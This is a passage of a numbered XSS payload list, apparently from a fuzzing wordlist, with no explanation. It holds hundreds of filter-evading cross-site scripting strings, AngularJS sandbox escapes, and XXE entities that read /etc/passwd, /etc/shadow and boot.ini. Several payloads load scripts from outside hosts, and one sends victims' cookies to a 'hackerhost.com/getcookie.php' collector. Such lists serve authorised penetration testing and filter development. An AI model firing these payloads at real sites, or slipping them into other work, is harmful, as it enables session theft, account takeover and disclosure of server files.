  1366. <style TYPE="text/javascript">document.vulnerable=true;</style>
  1367. <style>.XSS{background-image:url("javascript:document.vulnerable=true");}</STYLE><A CLASS=XSS></a>
  1368. <style type="text/css">BODY{background:url("javascript:document.vulnerable=true")}</style>
  1369. <!--[if gte IE 4]><SCRIPT>document.vulnerable=true;</SCRIPT><![endif]-->
  1370. <base HREF="javascript:document.vulnerable=true;//">
  1371. <OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:document.vulnerable=true></object>
  1372. <XML ID=I><X><C><![<IMG SRC="javas]]<![cript:document.vulnerable=true;">]]</C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></span>
  1373. <XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:document.vulnerable=true"></B></I></XML><SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></span>
  1374. <html><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS<SCRIPT DEFER>document.vulnerable=true</SCRIPT>"></BODY></html>
  1375. <? echo('<SCR)';echo('IPT>document.vulnerable=true</SCRIPT>'); ?>
  1376. <meta HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>document.vulnerable=true</SCRIPT>">
  1377. <head><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-document.vulnerable=true;+ADw-/SCRIPT+AD4-
  1378. <a href="javascript#document.vulnerable=true;">
  1379. <div onmouseover="document.vulnerable=true;">
  1380. <img src="javascript:document.vulnerable=true;">
  1381. <img dynsrc="javascript:document.vulnerable=true;">
  1382. <input type="image" dynsrc="javascript:document.vulnerable=true;">
  1383. <bgsound src="javascript:document.vulnerable=true;">
  1384. &<script>document.vulnerable=true;</script>
  1385. &{document.vulnerable=true;};
  1386. <img src=&{document.vulnerable=true;};>
  1387. <link rel="stylesheet" href="javascript:document.vulnerable=true;">
  1388. <iframe src="vbscript:document.vulnerable=true;">
  1389. <img src="mocha:document.vulnerable=true;">
  1390. <img src="livescript:document.vulnerable=true;">
  1391. <a href="about:<script>document.vulnerable=true;</script>">
  1392. <meta http-equiv="refresh" content="0;url=javascript:document.vulnerable=true;">
  1393. <body onload="document.vulnerable=true;">
  1394. <div style="background-image: url(javascript:document.vulnerable=true;);">
  1395. <div style="behaviour: url([link to code]);">
  1396. <div style="binding: url([link to code]);">
  1397. <div style="width: expression(document.vulnerable=true;);">
  1398. <style type="text/javascript">document.vulnerable=true;</style>
  1399. <object classid="clsid:..." codebase="javascript:document.vulnerable=true;">
  1400. <style><!--</style><script>document.vulnerable=true;//--></script>
  1401. <<script>document.vulnerable=true;</script>
  1402. <![<!--]]<script>document.vulnerable=true;//--></script>
  1403. <!-- -- --><script>document.vulnerable=true;</script><!-- -- -->
  1404. <img src="blah"onmouseover="document.vulnerable=true;">
  1405. <img src="blah>" onmouseover="document.vulnerable=true;">
  1406. <xml src="javascript:document.vulnerable=true;">
  1407. <xml id="X"><a><b><script>document.vulnerable=true;</script>;</b></a></xml>
  1408. <div datafld="b" dataformatas="html" datasrc="#X"></div>
  1409. [\xC0][\xBC]script>document.vulnerable=true;[\xC0][\xBC]/script>
  1410. <style>@import'http://www.securitycompass.com/xss.css';</style>
  1411. <meta HTTP-EQUIV="Link" Content="<http://www.securitycompass.com/xss.css>; REL=stylesheet">
  1412. <style>BODY{-moz-binding:url("http://www.securitycompass.com/xssmoz.xml#xss")}</style>
  1413. <OBJECT TYPE="text/x-scriptlet" DATA="http://www.securitycompass.com/scriptlet.html"></object>
  1414. <HTML xmlns:xss><?import namespace="xss" implementation="http://www.securitycompass.com/xss.htc"><xss:xss>XSS</xss:xss</html>
  1415. <script SRC="http://www.securitycompass.com/xss.jpg"></script>
  1416. <!--#exec cmd="/bin/echo '<SCR'"--><!--#exec cmd="/bin/echo 'IPT SRC=http://www.securitycompass.com/xss.js></SCRIPT>'"-->
  1417. <script a=">" SRC="http://www.securitycompass.com/xss.js"></script>
  1418. <script =">" SRC="http://www.securitycompass.com/xss.js"></script>
  1419. <script a=">" '' SRC="http://www.securitycompass.com/xss.js"></script>
  1420. <script "a='>'" SRC="http://www.securitycompass.com/xss.js"></script>
  1421. <script a=`>` SRC="http://www.securitycompass.com/xss.js"></script>
  1422. <script a=">'>" SRC="http://www.securitycompass.com/xss.js"></script>
  1423. <script>document.write("<SCRI");</SCRIPT>PT SRC="http://www.securitycompass.com/xss.js"></script>
  1424. <div style="binding: url(http://www.securitycompass.com/xss.js);"> [Mozilla]
  1425. ";>;<;BODY onload!#$%&;()*~+-_.,:;?@[/|\]^`=alert(";XSS";)>;
  1426. <;/script>;<;script>;alert(1)<;/script>;
  1427. <;/br style=a:expression(alert())>;
  1428. <;scrscriptipt>;alert(1)<;/scrscriptipt>;
  1429. <;br size=\";&;{alert(&#039;XSS&#039;)}\";>;
  1430. perl -e &#039;print \";<;IMG SRC=java\0script:alert(\";XSS\";)>;\";;&#039; >; out
  1431. perl -e &#039;print \";<;SCR\0IPT>;alert(\";XSS\";)<;/SCR\0IPT>;\";;&#039; >; out
  1432. <~/XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))>
  1433. <~/XSS/*-*/STYLE=xss:e/**/xpression(window.location="http://www.procheckup.com/?sid="%2bdocument.cookie)>
  1434. <~/XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))>
  1435. <~/XSS STYLE=xss:expression(alert('XSS'))>
  1436. "><script>alert('XSS')</script>
  1437. </XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))>
  1438. <XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))>
  1439. <XSS STYLE=xss:e/**/xpression(alert('XSS'))>
  1440. </XSS STYLE=xss:expression(alert('XSS'))>
  1441. >"><script>alert("XSS")</script>&
  1442. "><STYLE>@import"javascript:alert('XSS')";</STYLE>>"'><img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;alert(%26quot;%26%23x20;XSS%26%23x20;Test%26%23x20;Successful%26quot;)>
  1443. >%22%27><img%20src%3d%22javascript:alert(%27%20XSS%27)%22>
  1444. '%uff1cscript%uff1ealert('XSS')%uff1c/script%uff1e'">>"
  1445. '';!--"<XSS>=&{()}
  1446. <IMG SRC="javascript:alert('XSS');">
  1447. <IMG SRC=javascript:alert('XSS')>
  1448. <IMG SRC=JaVaScRiPt:alert('XSS')>
  1449. <IMG SRC=JaVaScRiPt:alert(&quot;XSS<WBR>&quot;)>
  1450. <IMGSRC=&#106;&#97;&#118;&#97;&<WBR>#115;&#99;&#114;&#105;&#112;&<WBR>#116;&#58;&#97;&#108;&#101;&<WBR>#114;&#116;&#40;&#39;&#88;&#83<WBR>;&#83;&#39;&#41>
  1451. <IMGSRC=&#0000106&#0000097&<WBR>#0000118&#0000097&#0000115&<WBR>#0000099&#0000114&#0000105&<WBR>#0000112&#0000116&#0000058&<WBR>#0000097&#0000108&#0000101&<WBR>#0000114&#0000116&#0000040&<WBR>#0000039&#0000088&#0000083&<WBR>#0000083&#0000039&#0000041>
  1452. <IMGSRC=&#x6A&#x61&#x76&#x61&#x73&<WBR>#x63&#x72&#x69&#x70&#x74&#x3A&<WBR>#x61&#x6C&#x65&#x72&#x74&#x28&<WBR>#x27&#x58&#x53&#x53&#x27&#x29>
  1453. <IMG SRC="jav&#x0A;ascript:alert(<WBR>'XSS');">
  1454. <IMG SRC="jav&#x0D;ascript:alert(<WBR>'XSS');">
  1455. <![CDATA[<script>var n=0;while(true){n++;}</script>]]>
  1456. <?xml version="1.0" encoding="ISO-8859-1"?><foo><![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('gotcha');<![CDATA[<]]>/SCRIPT<![CDATA[>]]></foo>
  1457. <?xml version="1.0" encoding="ISO-8859-1"?><foo><![CDATA[' or 1=1 or ''=']]></foof>
  1458. <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file://c:/boot.ini">]><foo>&xee;</foo>
  1459. <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:///etc/passwd">]><foo>&xee;</foo>
  1460. <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:///etc/shadow">]><foo>&xee;</foo>
  1461. <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:///dev/random">]><foo>&xee;</foo>
  1462. <script>alert('XSS')</script>
  1463. %3cscript%3ealert('XSS')%3c/script%3e
  1464. %22%3e%3cscript%3ealert('XSS')%3c/script%3e
  1465. <IMG SRC="javascript:alert('XSS');">
  1466. <IMG SRC=javascript:alert(&quot;XSS&quot;)>
  1467. <IMG SRC=javascript:alert('XSS')>
  1468. <img src=xss onerror=alert(1)>
  1469. <IMG """><SCRIPT>alert("XSS")</SCRIPT>">
  1470. <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
  1471. <IMG SRC="jav ascript:alert('XSS');">
  1472. <IMG SRC="jav&#x09;ascript:alert('XSS');">
  1473. <IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>
  1474. <IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>
  1475. <IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
  1476. <BODY BACKGROUND="javascript:alert('XSS')">
  1477. <BODY ONLOAD=alert('XSS')>
  1478. <INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
  1479. <IMG SRC="javascript:alert('XSS')"
  1480. <iframe src=http://ha.ckers.org/scriptlet.html <
  1481. <<SCRIPT>alert("XSS");//<</SCRIPT>
  1482. %253cscript%253ealert(1)%253c/script%253e
  1483. "><s"%2b"cript>alert(document.cookie)</script>
  1484. foo<script>alert(1)</script>
  1485. <scr<script>ipt>alert(1)</scr</script>ipt>
  1486. <SCRIPT>String.fromCharCode(97, 108, 101, 114, 116, 40, 49, 41)</SCRIPT>
  1487. ';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
  1488. <marquee onstart='javascript:alert('1');'>=(◕_◕)=
  1489. "><img src=x onerror=prompt(0)>
  1490. <iframe src="x-javascript&colon;alert(document.domain);"></iframe>
  1491. <marquee><h1>XSS by xss</h1></marquee>
  1492. <script>-=alert;-(1)</script> "onmouseover="confirm(document.domain);"" </script>
  1493. <script>alert(2)</script> "><img src=x onerror=prompt(document.domain)>
  1494. “><IMG SRC=x onerror=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
  1495. “><a XSS-test href=jAvAsCrIpT&colon;prompt&lpar;/Xss-By-Muhaddi/&rpar;>ClickMe
  1496. “><h1/onclick=a\u006cer\u0074(/Xss-By-Muhaddi/)>Click Me</h1>
  1497. “><a id=”ahref=javascript&colon;a\u006cer\u0074&lpar;/Xss-By-Muhaddi/&rpar; id=”xss-test”>Click me</a>#a <
  1498. <a href=”data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+”>ClickMe
  1499. <<SCRIPT>alert(“Xss”);//<</SCRIPT>
  1500. %253script%253ealert(/Xss/)%253c/script%253e
  1501. “><s”%2bcript>alert(/Xss/)</script>
  1502. foo<script>alert(/Xss/)</script>
  1503. <scr<script>ipt>alert(/Xss/)</scr</script>ipt>
  1504. xss:expression(alert(/Xss/)
  1505. body{xss:expression(alert(“Xss”))}
  1506. “><detials ontoggle=confirm(0)>
  1507. “><IMG SRC=x onerror=javascript:alert(&quot;Xss&quot;)>
  1508. “><img onmouseover=alert(“Xss”)>
  1509. “><test onclick=alert(/Xss/)>Click Me</test>
  1510. “><a href=javascript:alert(/Xss/)Click Me</a>
  1511. “><h1 onmouseover=alert(“Xss”)>Hover Me</h1>
  1512. “><svg/onload=prompt(“Xss”)>
  1513. “><body/onload=alert(“Xss”)>
  1514. “><iFrAmE/src=jAvAscrIpT:alert(/Xss/)>
  1515. “><ScRiPt>alert(“Xss”)</sCrIpT>
  1516. </script><script>alert(“Xss”)</script>
  1517. “);alert(“Xss”);//
  1518. <script>alert(“Xss”)</script>
  1519. “><script>alert(“Xss”)</script>
  1520. “><script>alert(/Xss/)</script>
  1521. {{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };alert(1)//');}}
  1522. {{'a'.constructor.prototype.charAt=[].join;$eval('x=alert(1)');}}
  1523. {{ 'a'[{toString:false,valueOf:[].join,length:1,0:'__proto__'}].charAt=[].join; $eval('x=alert(1)//'); }}
  1524. {{{}[{toString:[].join,length:1,0:'__proto__'}].assign=[].join; 'a'.constructor.prototype.charAt=[].join; $eval('x=alert(1)//'); }}
  1525. {{ {}[{toString:[].join,length:1,0:'__proto__'}].assign=[].join; 'a'.constructor.prototype.charAt=''.valueOf; $eval('x=alert(1)//'); }}
  1526. {{!ready && (ready = true) && (!call ? $$watchers[0].get(toString.constructor.prototype) : (a = apply) && (apply = constructor) && (valueOf = call) && (''+''.toString('F = Function.prototype;' + 'F.apply = F.a;' + 'delete F.a;' + 'delete F.valueOf;' + 'alert(1);')));}}
  1527. {{'a'.constructor.prototype.charAt=''.valueOf;$eval("x='\"+(y='if(!window\\u002ex)alert(window\\u002ex=1)')+eval(y)+\"'");}}
  1528. {{toString.constructor.prototype.toString=toString.constructor.prototype.call;["a","alert(1)"].sort(toString.constructor);}}
  1529. {{(_=''.sub).call.call({}[$='constructor'].getOwnPropertyDescriptor(_.__proto__,$).value,0,'alert(1)')()}}
  1530. {{'a'[{toString:[].join,length:1,0:'__proto__'}].charAt=''.valueOf;$eval("x='"+(y='if(!window\\u002ex)alert(window\\u002ex=1)')+eval(y)+"'");}}
  1531. {{a='constructor';b={};a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].getPrototypeOf(a.sub),a).value,0,'alert(1)')()}}
  1532. {{constructor.constructor('alert(1)')()}} <div ng-app> {'a'.constructor.fromCharCode=[].join; 'a'.constructor[0]='\u003ciframe onload=alert(/Backdoored/)\u003e';}} </div> <div ng-app> {{'a'.constructor.prototype.charAt=[].join; $eval('x=alert(1)')+''}} </div> <script> onload=function(){document.write(String.fromCharCode(97));}</script> <SCRIPT SRC=http://3w.org/XSS/xss.js> </ SCRIPT> <SCRIPT SRC=http://3w.org/XSS/xss.js> </ SCRIPT> <IMG SRC=javascript:alert('XSS')> <IMG SRC=JaVaScRiPt:alert('XSS')> <IMG SRC=javascript:alert("XSS")> <IMG """> <SCRIPT> Alert ("XSS") </ SCRIPT> "> <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))> <IMG SRC=jav..??..S')> Unicode encoding ( 9 ) 7 of UTF-8 is no semicolon ( calculator ) <IMG SRC=jav..??..S')> <IMG SRC=java..??..XSS')> <IMG SRC="jav ascript:alert('XSS');"> <IMG SRC="jav ascript:alert('XSS');"> <IMG SRC = "jav ascript: alert ('XSS ' ) ; " > <IMG SRC="jav ascript:alert('XSS');"> <IMG SRC="javascript:alert('XSS')"> <script> z = 'document.' </ script> <script> z = z + 'write ("' </ script> <script> z = z + '<script' </ script> <script> z = z + 'src = ht' </ script> <script> z = z + 'tp :/ / ww' </ script> <script> z = z + 'w.zoyzo' </ script> <script> z = z + '. cn / 1.' </ script> <script> z = z + 'js> </ sc' </ script> <script> z = z + 'ript> ")' </ script> <script> eval_r (z) </ script> perl-e 'print "<IMG SRC=javascript:alert("XSS")>";'> out perl-e 'print "<SCRIPT> alert (" XSS ") </ SCRIPT>";'> out <IMG SRC=" javascript:alert('XSS');"> <SCRIPT/XSS SRC="http://3w.org/XSS/xss.js"> </ SCRIPT> <BODY Onload!#$%&()*~+-_.,:;?@[/|]^`=alert("XSS")> <SCRIPT/SRC="http://3w.org/XSS/xss.js"> </ SCRIPT> << SCRIPT> alert ("XSS") ;/ / << / SCRIPT> <SCRIPT SRC = http://3w.org/XSS/xss.js? <B> <SCRIPT SRC=//3w.org/XSS/xss.js> <IMG SRC = "javascript: alert ('XSS')" <iframe src=http://3w.org/XSS.html> <SCRIPT> A = / XSS / alert (a.source) </ SCRIPT> "; alert ('XSS') ;/ / </ TITLE> <SCRIPT> alert ("XSS"); </ SCRIPT> <INPUT SRC="javascript:alert('XSS');"> <BODY BACKGROUND="javascript:alert('XSS')"><BODY('XSS')> <IMG DYNSRC="javascript:alert('XSS')"> <IMG LOWSRC="javascript:alert('XSS')"> <BGSOUND SRC="javascript:alert('XSS');"> <LINK REL="stylesheet" HREF="javascript:alert('XSS');"> <LINK REL="stylesheet" HREF="http://3w.org/xss.css"> <STYLE> Li {list-style-image: url ("javascript: alert ('XSS')");} </ STYLE> <UL> <LI> XSS <IMG SRC='vbscript:msgbox("XSS")'> </ STYLE> <UL> <LI> XSS %3Cscript%3Ealert(%22XSS%22)%3C/script%3E &lt;script&gt;alert("XSS")&lt;/script&gt; &lt;script&gt;alert("XSS")&lt;/script&gt; &lt;script&gt;alert(%34XSS%34)&lt;/script&gt; &lt;script&gt;alert('XSS')&lt;/script&gt; callback=javascript://anything%0D%0A%0D%0Awindow.alert(1)// javascript:alert(document.cookie);// ';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//"; alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//-- ></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> <SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT> <IMG SRC="javascript:alert('XSS');"> <a onmouseover="alert(document.cookie)">xxs link</a> <a onmouseover=alert(document.cookie)>xxs link</a>
  1533. ';alert(String.fromCharCode(88,83,83))//\'; alert(String.fromCharCode(88,83,83))//"; alert(String.fromCharCode(88,83,83))//\"; alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT> alert(String.fromCharCode(88,83,83))</SCRIPT>
  1534. "><img src=x onerror=prompt(1)>
  1535. "><script>alert(“XSS”);</script>
  1536. x'\"></script><img src=x onerror=alert(1)>
  1537. "><svg onload="prompt(/xss/)"></svg>
  1538. "onmouseover="alert(1)
  1539. %22%3E%3C/script%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
  1540. %22%3E%3Cscript%3Ealert%28/xss/%29%3C/script%3E
  1541. %22%3B%3E%3Cscript%3Ealert(String.fromCharCode(73,69,82,82,69%3B%3C%2Fscript%3E
  1542. %22%3E%3Cimg%20src=k%20onerror=alert%28%22XSS%22%29%20/%3E
  1543. "><font size=70 color=red>
  1544. "<style><img src='</style><img src=x onerror=alert("document.cookie")//'>
  1545. '<script>alert('xss message')</script>
  1546. "><script>alert('xss message')</script>
  1547. >/"><script>alert('xss message')</script>
  1548. "><script>alert(document.cookie)</script>
  1549. "><script>alert(document.cookie)</script>/><':
  1550. ;<><script></script>/<script>alert('0')</script>
  1551. </script><script>prompt("test")</script>
  1552. "><script>alert(document.location)</script><"
  1553. <SCRIPT>Document.write('<img src=\'http://hackerhost.com/getcookie.php?cookie='+escape(document.cookie)+'\' height=1 width=1>');</SCRIPT>
  1554. onmouseover=prompt(document.domain
  1555. <ScRiPt%20>prompt(document.domain)</ScRiPt>
  1556. javascript:alert(1);
  1557. javascript:alert(document.domain);
  1558. ';alert(/xss/)///';alert(1)//";alert(2)///";alert(3)//--></SCRIPT>">'><SCRIPT>alert(/xss/)</SCRIPT>=&{}");}alert(6);functions+xss(){//
  1559. ';alert(/xss/)///
  1560. 'onerror='alert('XSS')' a='.jpg
  1561. '|alert('XSS')|'
  1562. %27|alert%28%27XSS%27%29|%27
  1563. %2527%257Calert%2528%2527XSS%2527%2529%257C%2527
  1564. "};alert(23);a={"a":
  1565. “x:expr/**/ession(alert(1))”
  1566. "};alert(23);a={"a":
  1567. <script>String.fromCharCode(97, 108, 101, 114, 116, 40, 34, 104, 105, 34, 41, 59)</script>
  1568. %3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%22%48%69%22%29%3b%3c%2f%73%63%72%69%70%74%3e
  1569. <ScRipt>ALeRt("hi");</sCRipT>
  1570. vulnerable"%3B%20alert(%27Mondays%27)%3B%20"
  1571. /?#&;:="%<>@[\\]^`{|}
  1572. '';!--"<XSS>=&{()}
  1573. "--></style></script><script>alert("XSS")</script>
  1574. <script>window.alert('XSS Vulnerable');</script>
  1575. "><img src=x onerror='alert(xzz)'>
  1576. "><img src=x onerror='alert(document.domain)'>
  1577. ' "/><img src= x onerror=prompt(/xss/)>
  1578. "><img src=x onerror=prompt(/xss by me/)>
  1579. <img src='test' onmouseover='alert(2)'>
  1580. <img src="x" alt="''onmouseover=alert(1)">
  1581. '"--></style></scRipt><scRipt>alert('XSSPOS ED')</scRipt>
  1582. /><script>window.alert('XSS Vulnerable');</script>
  1583. <script\x20type="text/javascript">javascript:alert(1);</script>
  1584. <script\x3Etype="text/javascript">javascript:alert(1);</script>
  1585. <script\x0Dtype="text/javascript">javascript:alert(1);</script>
  1586. <script\x09type="text/javascript">javascript:alert(1);</script>
  1587. <script\x0Ctype="text/javascript">javascript:alert(1);</script>
  1588. <script\x2Ftype="text/javascript">javascript:alert(1);</script>
  1589. <script\x0Atype="text/javascript">javascript:alert(1);</script>
  1590. '`"><\x3Cscript>javascript:alert(1)</script>
  1591. '`"><\x00script>javascript:alert(1)</script>
  1592. <img src=1 href=1 onerror="javascript:alert(1)"></img>
  1593. <audio src=1 href=1 onerror="javascript:alert(1)"></audio>
  1594. <video src=1 href=1 onerror="javascript:alert(1)"></video>
  1595. <body src=1 href=1 onerror="javascript:alert(1)"></body>
  1596. <image src=1 href=1 onerror="javascript:alert(1)"></image>
  1597. <object src=1 href=1 onerror="javascript:alert(1)"></object>
  1598. <script src=1 href=1 onerror="javascript:alert(1)"></script>
  1599. <svg onResize svg onResize="javascript:javascript:alert(1)"></svg onResize>
  1600. <title onPropertyChange title onPropertyChange="javascript:javascript:alert(1)"></title onPropertyChange>
  1601. <iframe onLoad iframe onLoad="javascript:javascript:alert(1)"></iframe onLoad>
  1602. <body onMouseEnter body onMouseEnter="javascript:javascript:alert(1)"></body onMouseEnter>
  1603. <body onFocus body onFocus="javascript:javascript:alert(1)"></body onFocus>
  1604. <frameset onScroll frameset onScroll="javascript:javascript:alert(1)"></frameset onScroll>
  1605. <script onReadyStateChange script onReadyStateChange="javascript:javascript:alert(1)"></script onReadyStateChange>
  1606. <html onMouseUp html onMouseUp="javascript:javascript:alert(1)"></html onMouseUp>
  1607. <body onPropertyChange body onPropertyChange="javascript:javascript:alert(1)"></body onPropertyChange>
  1608. <svg onLoad svg onLoad="javascript:javascript:alert(1)"></svg onLoad>
  1609. <body onPageHide body onPageHide="javascript:javascript:alert(1)"></body onPageHide>
  1610. <body onMouseOver body onMouseOver="javascript:javascript:alert(1)"></body onMouseOver>
  1611. <body onUnload body onUnload="javascript:javascript:alert(1)"></body onUnload>
  1612. <body onLoad body onLoad="javascript:javascript:alert(1)"></body onLoad>
  1613. <bgsound onPropertyChange bgsound onPropertyChange="javascript:javascript:alert(1)"></bgsound onPropertyChange>
  1614. <html onMouseLeave html onMouseLeave="javascript:javascript:alert(1)"></html onMouseLeave>
  1615. <html onMouseWheel html onMouseWheel="javascript:javascript:alert(1)"></html onMouseWheel>
  1616. <style onLoad style onLoad="javascript:javascript:alert(1)"></style onLoad>
  1617. <iframe onReadyStateChange iframe onReadyStateChange="javascript:javascript:alert(1)"></iframe onReadyStateChange>
  1618. <body onPageShow body onPageShow="javascript:javascript:alert(1)"></body onPageShow>
  1619. <style onReadyStateChange style onReadyStateChange="javascript:javascript:alert(1)"></style onReadyStateChange>
  1620. <frameset onFocus frameset onFocus="javascript:javascript:alert(1)"></frameset onFocus>
  1621. <applet onError applet onError="javascript:javascript:alert(1)"></applet onError>
  1622. <marquee onStart marquee onStart="javascript:javascript:alert(1)"></marquee onStart>
  1623. <script onLoad script onLoad="javascript:javascript:alert(1)"></script onLoad>
  1624. <html onMouseOver html onMouseOver="javascript:javascript:alert(1)"></html onMouseOver>
  1625. <html onMouseEnter html onMouseEnter="javascript:parent.javascript:alert(1)"></html onMouseEnter>
  1626. <body onBeforeUnload body onBeforeUnload="javascript:javascript:alert(1)"></body onBeforeUnload>
  1627. <html onMouseDown html onMouseDown="javascript:javascript:alert(1)"></html onMouseDown>
  1628. <marquee onScroll marquee onScroll="javascript:javascript:alert(1)"></marquee onScroll>
  1629. <xml onPropertyChange xml onPropertyChange="javascript:javascript:alert(1)"></xml onPropertyChange>
  1630. <frameset onBlur frameset onBlur="javascript:javascript:alert(1)"></frameset onBlur>
  1631. <applet onReadyStateChange applet onReadyStateChange="javascript:javascript:alert(1)"></applet onReadyStateChange>
  1632. <svg onUnload svg onUnload="javascript:javascript:alert(1)"></svg onUnload>
  1633. <html onMouseOut html onMouseOut="javascript:javascript:alert(1)"></html onMouseOut>
  1634. <body onMouseMove body onMouseMove="javascript:javascript:alert(1)"></body onMouseMove>
  1635. <body onResize body onResize="javascript:javascript:alert(1)"></body onResize>
  1636. <object onError object onError="javascript:javascript:alert(1)"></object onError>
  1637. <body onPopState body onPopState="javascript:javascript:alert(1)"></body onPopState>
  1638. <html onMouseMove html onMouseMove="javascript:javascript:alert(1)"></html onMouseMove>
  1639. <applet onreadystatechange applet onreadystatechange="javascript:javascript:alert(1)"></applet onreadystatechange>
  1640. <body onpagehide body onpagehide="javascript:javascript:alert(1)"></body onpagehide>
  1641. <svg onunload svg onunload="javascript:javascript:alert(1)"></svg onunload>
  1642. <applet onerror applet onerror="javascript:javascript:alert(1)"></applet onerror>
  1643. <body onkeyup body onkeyup="javascript:javascript:alert(1)"></body onkeyup>
  1644. <body onunload body onunload="javascript:javascript:alert(1)"></body onunload>
  1645. <iframe onload iframe onload="javascript:javascript:alert(1)"></iframe onload>
  1646. <body onload body onload="javascript:javascript:alert(1)"></body onload>
  1647. <html onmouseover html onmouseover="javascript:javascript:alert(1)"></html onmouseover>
  1648. <object onbeforeload object onbeforeload="javascript:javascript:alert(1)"></object onbeforeload>
  1649. <body onbeforeunload body onbeforeunload="javascript:javascript:alert(1)"></body onbeforeunload>
  1650. <body onfocus body onfocus="javascript:javascript:alert(1)"></body onfocus>
  1651. <body onkeydown body onkeydown="javascript:javascript:alert(1)"></body onkeydown>
  1652. <iframe onbeforeload iframe onbeforeload="javascript:javascript:alert(1)"></iframe onbeforeload>
  1653. <iframe src iframe src="javascript:javascript:alert(1)"></iframe src>
  1654. <svg onload svg onload="javascript:javascript:alert(1)"></svg onload>
  1655. <html onmousemove html onmousemove="javascript:javascript:alert(1)"></html onmousemove>
  1656. <body onblur body onblur="javascript:javascript:alert(1)"></body onblur>
  1657. \x3Cscript>javascript:alert(1)</script>
  1658. '"`><script>/* *\x2Fjavascript:alert(1)// */</script>
  1659. <script>javascript:alert(1)</script\x0D
  1660. <script>javascript:alert(1)</script\x0A
  1661. <script>javascript:alert(1)</script\x0B
  1662. <script charset="\x22>javascript:alert(1)</script>
  1663. <!--\x3E<img src=xxx:x onerror=javascript:alert(1)> -->
  1664. --><!-- ---> <img src=xxx:x onerror=javascript:alert(1)> -->
  1665. --><!-- --\x00> <img src=xxx:x onerror=javascript:alert(1)> -->
  1666. --><!-- --\x21> <img src=xxx:x onerror=javascript:alert(1)> -->
  1667. --><!-- --\x3E> <img src=xxx:x onerror=javascript:alert(1)> -->
  1668. `"'><img src='#\x27 onerror=javascript:alert(1)>
  1669. <a href="javascript\x3Ajavascript:alert(1)" id="fuzzelement1">test</a>
  1670. "'`><p><svg><script>a='hello\x27;javascript:alert(1)//';</script></p>
  1671. <a href="javas\x00cript:javascript:alert(1)" id="fuzzelement1">test</a>
  1672. <a href="javas\x07cript:javascript:alert(1)" id="fuzzelement1">test</a>
  1673. <a href="javas\x0Dcript:javascript:alert(1)" id="fuzzelement1">test</a>
  1674. <a href="javas\x0Acript:javascript:alert(1)" id="fuzzelement1">test</a>
  1675. <a href="javas\x08cript:javascript:alert(1)" id="fuzzelement1">test</a>
  1676. <a href="javas\x02cript:javascript:alert(1)" id="fuzzelement1">test</a>
  1677. <a href="javas\x03cript:javascript:alert(1)" id="fuzzelement1">test</a>
  1678. <a href="javas\x04cript:javascript:alert(1)" id="fuzzelement1">test</a>
  1679. <a href="javas\x01cript:javascript:alert(1)" id="fuzzelement1">test</a>
  1680. <a href="javas\x05cript:javascript:alert(1)" id="fuzzelement1">test</a>
  1681. <a href="javas\x0Bcript:javascript:alert(1)" id="fuzzelement1">test</a>
  1682. <a href="javas\x09cript:javascript:alert(1)" id="fuzzelement1">test</a>
  1683. <a href="javas\x06cript:javascript:alert(1)" id="fuzzelement1">test</a>
  1684. <a href="javas\x0Ccript:javascript:alert(1)" id="fuzzelement1">test</a>
